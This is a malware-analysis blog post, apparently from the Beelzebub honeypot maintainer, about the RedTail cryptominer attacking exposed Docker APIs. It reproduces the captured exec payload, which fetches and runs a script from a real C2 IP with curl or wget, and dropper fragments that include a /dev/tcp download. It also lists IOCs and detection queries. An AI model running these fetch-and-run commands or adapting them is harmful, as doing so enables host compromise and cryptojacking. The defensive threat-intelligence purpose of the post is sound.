- RedTail
- Cryptominer
- Docker API Honeypot
RedTail Cryptominer: First Evidence of Docker API Targeting
Data from Beelzebub honeypot has captured what appears to be the first documented evidence of RedTail cryptominer attacking exposed Docker APIs (port 2375). Despite extensive research across vendor reports, threat intelligence platforms, GitHub repositories, and academic analyses, no public source documents RedTail targeting Docker, only web applications and network appliances. This could be a significant discovery indicating a new tactical evolution by the threat actor.
Mario Candela
Founder and maintainer
TL;DR - Executive Summary
Data from my Beelzebub honeypot has captured what appears to be the first documented evidence of RedTail cryptominer attacking exposed Docker APIs (port 2375). Despite extensive research across vendor reports, threat intelligence platforms, GitHub repositories, and academic analyses, no public source documents RedTail targeting Docker - only web applications and network appliances.
This could be a significant discovery indicating a new tactical evolution by the threat actor.
The Capture: Honeypot Logs
On November 13, 2025 at 14:13:38 UTC, Beelzebub honeypot recorded this attack:
{
"RemoteAddr": "62.84.181.157:29880",
"Location": "Shrewsbury, United Kingdom",
"HTTPMethod": "POST",
"RequestURI": "/containers/a0c2c51c1f7a4b20a9cc1a0b4a9b06f3040c14b496f0f3c21bd7e0f3ae90f7b6/exec",
"UserAgent": "libredtail-http",
"Body": {
"Cmd": [
"sh", "-c",
"cd /tmp || cd /var/tmp; curl http://178.16.55.224/sh -o redtail.sh || wget http://178.16.55.224/sh -O redtail.sh; chmod +x redtail.sh; ./redtail.sh docker.selfrep; rm -rf redtail.sh"
]
}
}Key elements:
- Target: Docker Engine API v1.43 (port 2375)
- User-Agent:
libredtail-http(unique RedTail signature) - C2 Server:
178.16.55.224(confirmed RedTail infrastructure) - Parameter:
docker.selfrep(self-replication mode)
Payload Analysis
I captured the sh script downloaded from the C2. Here’s what it does:
1. Random Name Generation
get_random_string() {
openssl rand -base64 256 | tr -dc 'A-Za-z0-9' | head -c "$len"
}2. Resilient Multi-Method Download
dlr() {
wget http://178.16.55.224/$1 ||
curl -O http://178.16.55.224/$1 ||
exec 3<>"/dev/tcp/178.16.55.224/80"
echo -e "GET /$1 HTTP/1.0\r\n..." >&3
}Note: Using /dev/tcp bypasses wget/curl monitoring!
3. Writable Directory Search
The script scans the filesystem looking for:
- Directories with
u=rwxpermissions - Avoids partitions with
noexecflag - Excludes
/procand monitored directories - Verifies available space (2MB test)
4. Multi-Architecture Deployment
Downloads and executes architecture-specific binaries for:
- x86_64 / amd64
- i686 (32-bit)
- ARM v7 / v8 (aarch64)
5. “clean” Script
Before installation, executes a script that likely:
- Terminates competing cryptominers
- Removes other attackers’ malware
- Frees CPU resources
Threat Intelligence Research:
After capturing this data, I conducted a deep research using Claude to correlate information across dozens of sources. The research covered:
- Security vendor reports (Akamai, Forescout, Trend Micro, Kaspersky, Microsoft)
- Threat intelligence platforms (VirusTotal, AbuseIPDB, Malpedia, Joe Sandbox)
- GitHub repositories and analyses (honeypot logs, malware samples)
- Academic papers (ACM, IEEE, ArXiv)
- Security community (SANS ISC, forums, social media)
What Is Confirmed
RedTail is extensively documented in the following campaigns:
Evolution Timeline
Phase 1 (December 2023 - February 2024)
- First observation: Log4Shell exploitation
- SANS ISC: 400+ file submissions from IPs 193.222.96.163 and 45.95.147.236
- Basic multi-architecture deployment
- SSH brute force (root/Passw0rd123)
Phase 2 (March - April 2024)
- CVE-2024-3400 (PAN-OS CVSS 10.0)
- Private mining pools (no visible wallets)
- Advanced anti-debugging
- Encrypted communications via SSH-agent
- Expansion: TP-Link, VMware Workspace ONE, Ivanti VPN
Phase 3 (June 2024 - Present)
- CVE-2024-4577 (PHP-CGI CVSS 9.8)
- 178.16.55.224 as primary C2
- User-Agent “libredtail-http”
- Forescout: 227 attempts in 2 weeks
Exploited Vulnerabilities
- CVE-2024-4577 (PHP-CGI)
- CVE-2024-3400 (PAN-OS)
- CVE-2024-21887, CVE-2023-46805 (Ivanti)
- CVE-2023-1389 (TP-Link)
- CVE-2022-22954 (VMware)
- CVE-2021-44228 (Log4Shell)
- CVE-2018-20062 (ThinkPHP)
What Was NOT Found
Despite searching across:
- Vendor reports: Akamai, Forescout, Trend Micro, Kaspersky
- Threat intel: VirusTotal, AbuseIPDB, Malpedia, Joe Sandbox
- Honeypots: SANS ISC (3 diary entries), GitHub repositories
- Academic: ACM, IEEE papers, arxiv research
- Community: Security Twitter/X, Reddit, LinkedIn
ZERO mentions of:
- RedTail + Docker API
- 178.16.55.224 + port 2375
- Parameter “docker.selfrep”
Hypotheses
Hypothesis 1: Infrastructure Reuse
The threat actor uses 178.16.55.224 for multiple campaigns:
- Web exploitation → Documented RedTail
- Docker API targeting → Unpublished variant
Hypothesis 2: Intelligence Gap
- Docker exploitation occurs but below public reporting threshold
- Not yet reached vendor awareness
Indicators of Compromise (IOCs)
Network
C2 Server: 178.16.55.224
ASN: AS214943 (Railnet LLC)
User-Agent: libredtail-http
Mining Port: 25720/TCP
URL Pattern: http://178.16.55.224/sh
Parameters: *.selfrep (php.selfrep, docker.selfrep)Attacker IPs (Confirmed Campaigns)
36.140.33.10
141.98.11.82
45.128.232.200
5.182.211.148
94.103.125.37
87.120.113.231File System
Script: redtail.sh
Hidden file: .redtail, .<random_string>
Binary pattern: x86_64, i686, aarch64, arm7
Persistence: @reboot cron jobs
SSH: authorized_keys modificationHashes (from Forescout Analysis)
Shell Script: 2c602147c727621c5e98525466b8ea78832abe2c3de10f0b33ce9a4adea205eb
Packed ELF: ab897157fdef11b267e986ef286fd44a699e3699a458d90994e020619653d2cd
Unpacked ELF: 9ffad174474bb65e574baa567b23ffc1e13359fe2749b02fc8fc7846caceff7aRecommended Defenses
Detection Queries
Splunk
index=linux sourcetype=linux_secure
| search "libredtail-http" OR "178.16.55.224" OR ".redtail"
| stats count by host, user, src_ipElastic
{
"query": {
"bool": {
"should": [
{"match": {"user_agent": "libredtail-http"}},
{"match": {"destination.ip": "178.16.55.224"}},
{"wildcard": {"file.path": "*redtail*"}}
]
}
}
}MITRE ATT&CK Mapping
| Tactic | Technique | Evidence |
|---|---|---|
| Initial Access | T1190 - Exploit Public App | Docker API 2375, 8 CVEs |
| Execution | T1059.004 - Unix Shell | Bash dropper script |
| Persistence | T1053.003 - Cron | @reboot jobs |
| Privilege Escalation | T1611 - Escape Container | Host mount /:/host |
| Defense Evasion | T1027 - Obfuscated Files | Random filenames |
| Defense Evasion | T1070.004 - File Deletion | rm -rf self |
| Credential Access | T1552.001 - SSH Keys | authorized_keys mod |
| Discovery | T1083 - File Discovery | Filesystem scanning |
| Lateral Movement | T1021.004 - SSH | SSH key propagation |
| Command & Control | T1573 - Encrypted Channel | SSH-agent, AES JSON-RPC |
| Impact | T1496 - Resource Hijacking | XMRig cryptomining |
Conclusions
The Beelzebub honeypot has documented what appears to be the first public evidence of the RedTail cryptominer attacking exposed Docker APIs. This is a significant finding, considering that RedTail has been extensively documented in relation to 8 different vulnerabilities across web applications and network appliances, yet no public source had ever reported its use against Docker.
This represents a potential critical gap in public threat intelligence. 🚨
This is the fifth article in our series dedicated to malware analysis. The Beelzebub team continues its commitment to making the internet a safer place. ❤️